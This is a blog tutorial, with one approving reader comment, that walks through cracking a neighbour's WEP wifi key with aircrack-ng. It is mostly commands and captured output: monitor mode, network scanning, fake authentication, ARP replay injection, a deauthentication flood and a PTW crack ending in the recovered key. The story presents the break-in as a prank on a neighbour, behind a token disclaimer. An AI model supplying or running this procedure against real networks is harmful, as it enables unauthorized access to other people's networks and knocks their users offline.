1

Cracking wifi password


THIS TUTORIAL IS NOT INTENDED TO HARM OTHER PEOPLE!!!! This is only for informative purpose use at your own risk

CRACKING OTHERS PASSWORD WITHOUT HIS/HER PERMISSION IS ILLEGAL.... Stay Safe..

 One day, my friend called me up because he couldn’t connect to his neighbor's wireless network any more.
He was playing with her network connections and broke everything.He didn’t know the key for his wireless access point because it’s on the attic and we couldn’t reach it.....

So I thought I give it a try to hack the access point... for HIM... he he he.

You can also do this..
BUT MAKE Sure that neighbor is not going to file an FIR against u... he he..

Following are the steps, if you follow definitely you will get access of WAP ( Wireless Access Point)
The first thing is check your laptop and make sure that wireless network that you wish to crack is visible (say wifi9/7)...
Before start cracking you need to install some packages as shown below..
THE PROCESS BEGINS NOW..
Step (1). Installation of (aircrack-ng)

open your shell prompt and type

 sudo apt-get install aircrack-ng

 Step (2). List The Adapters

lokender@loki-ubuntu:~$ sudo airmon-ng

Interface Chipset Driver

 wlan0 Intel 3945ABG iwl3945 - [phy0]

 I have only one wireless card in my laptop (wlan0) so this is obviously the card I have to use...

 Step (3). Putting wireless in Monitoring Mode

lokender@loki-ubuntu:~$ sudo airmon-ng start wlan0

 Interface           Chipset                  Driver

 wlan0          Intel 3945ABG         iwl3945 - [phy0]
(monitor mode enabled on mon0)

 mon0 is a new interface using for monitoring. If we run the previous command again,
mon0 should be listed as interface.

 lokender@loki-ubuntu:~$ sudo airmon-ng

Interface               Chipset                Driver

 wlan0             Intel 3945ABG       iwl3945 - [phy0]
mon0              Intel 3945ABG       iwl3945 - [phy0]

 Step (4). Launching airdump
airodump is launched on the new interface to hop all the channels and show the founded wireless networks:

 lokender@loki-ubuntu:~$ sudo airodump-ng mon0


CH 2 ]    [ Elapsed: 24 s ]    [ 2010-02-08    19:43


BSSID                     PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

 00:21:91:F2:06:D9    -1       0             0        0  123   -1
00:1D:7E:43:52:33   -48     61           52       2    1   54e WPA2 CCMP    PSK   cisco
00:1B:11:6E:78:6D  -79     72            0        0     9   54   WEP   WEP              wifi6-2
00:24:01:65:97:69    -79     54           0         0     6   54  WEP   WEP              wifi9/7
00:1D:19:23:BC:57   -84    19          14         0     9   54  WPA2 CCMP   PSK   GCS
00:23:EE:CB:5A:61   -87    10           1         0    11 54e WPA    TKIP    PSK   telen
00:21:91:F3:7D:B6    -88    4             0         0    9    54  WEP   WEP     WIFI   18



BSSID                        STATION           PWR    Rate Lost   Packets        Probes
00:21:91:F2:06:D9 00:24:2B:8B:4F:81 -83      0 - 1    0         39    baranilew,bbox2-b0c7,default
00:1D:7E:43:52:33 00:1B:77:D9:A9:52  0    54e-54e 0          49          cisco

 The network that i wish to hack (wifi9/7) is listed. It is secured by WEP. If the security is WPA, it's harder to crack.

 Step (5). Again Running airdump-ng
Running airodump-ng again, but now , look at the channel which is used by the network we will crack. In this case 6

 lokender@loki-ubuntu:~$ sudo airodump-ng --channel 6 mon0

 CH 6 ][ Elapsed: 16 s ][ 2010-02-08 19:51 ][ fixed channel mon0: 1

BSSID            PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:21:91:F2:06:D9 -1  0      0             0        0   133 -1
00:1D:7E:43:52:33 -34 1    10            1        0    1  54e WPA2 CCMP   PSK   cisco
00:24:01:65:97:69 -75 96   117          0        0    6   54   WEP   WEP             wifi9/7

  BSSID                              STATION            PWR Rate Lost Packets Probes

00:21:91:F2:06:D9    00:24:2B:8B:4F:81       -85    0- 5    0        7       default
00:1D:7E:43:52:33   00:1B:77:D9:A9:52         0     1e- 1   0       10       cisco
let the previous screen run and open a new prompt to run a fake attempt for authentication.
The value after -a is the MAC-address from the network we want to crack, the -e value is the name of the network

 lokender@loki-ubuntu:~$ sudo aireplay-ng --fakeauth 0 -a 00:24:01:65:97:69 -e wifi9/7 mon0
No source MAC (-h) specified. Using the device MAC (00:1B:77:D9:A9:52)
19:56:24 Waiting for beacon frame (BSSID: 00:24:01:65:97:69) on channel 6

 19:56:24 Sending Authentication Request (Open System) [ACK]
19:56:24 Authentication successful
19:56:24 Sending Association Request [ACK]
19:56:24 Association successful :-) (AID: 1)

 The association is successfull. This means the target host doesn’t use MAC filtering. This is good, so it need not to spoof my MAC address.

 Now everything is ready to crack the key.

 If in your first console the airdump command is still running, close it and start it again with an option to save the output to a file:

 lokender@loki-ubuntu:~$ sudo airodump-ng --channel 6 -w /home/wim/crackwepwifi -i mon0

 CH 6 ][ Elapsed: 0 s ][ 2010-02-08 20:01

BSSID            PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:24:01:65:97:69 -72 100 29          4         0     6  54  WEP   WEP                wifi9/7

BSSID            STATION        PWR     Rate       Lost       Packets     Probes

 To crack the key really, I need a lot of data packets . In this case, I've only got 4 packets where I need around 100000 so I have to speed things up a little bit by launching aireplay in injection mode in a new console window to increase data traffic.

 lokender@loki-ubuntu:~$ sudo aireplay-ng -3 -b 00:24:01:65:97:69 mon0
No source MAC (-h) specified. Using the device MAC (00:1B:77:D9:A9:52)
20:07:31 Waiting for beacon frame (BSSID: 00:24:01:65:97:69) on channel 6
Saving ARP requests in replay_arp-0208-200731.cap
We can also start airodump-ng to capture replies.
Read 63 packets (got 0 ARP requests and 0 ACKs), sent 0 packets...(0 pps)

 Now keep the aireplay-ng and airodump-ng running and run the deauth attack.

 lokender@loki-ubuntu:~$ sudo aireplay-ng --deauth 0 -a 00:24:01:65:97:69 mon0
20:10:02 Waiting for beacon frame (BSSID: 00:24:01:65:97:69) on channel 6
NB: this attack is more effective when targeting a connected wireless client (-c ).
20:10:02 Sending DeAuth to broadcast -- BSSID: [00:24:01:65:97:69]
20:10:02 Sending DeAuth to broadcast -- BSSID: [00:24:01:65:97:69]
20:10:03 Sending DeAuth to broadcast -- BSSID: [00:24:01:65:97:69]
20:10:03 Sending DeAuth to broadcast -- BSSID: [00:24:01:65:97:69]

 Let everything run. After a few minutes, we will see that we are receiving ARP requests and the data will start increasing very feast. I’ve noticed, it goes a little bit faster when I tried to connect in Ubuntu with the target network.
When there are enough packets captured, it’s time to crack them.

 Step (6). Final Cracking

opened a new console /prompt and used following command where crackwepwifi-02.ivs is the file we entered previously:

 lokender@loki-ubuntu:~$ sudo aircrack-ng -0 -b 00:24:01:65:97:69 /home/loki/crackwepwifi-02.ivs
Opening /home/loki/crackwepwifi-02.ivs
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 88000 ivs.
KEY FOUND! [ 30:36:34:36:39 ] (ASCII: 06469 )
Decrypted correctly: 100%

 Got it! The key for the network is 06469....he he he he he....

 Comments are invited!!!!

1 comment:

  1. Unknown12 January 2014 at 07:25

    nice .. another good way to access wiFY.... good research ... keep it up

    ReplyDelete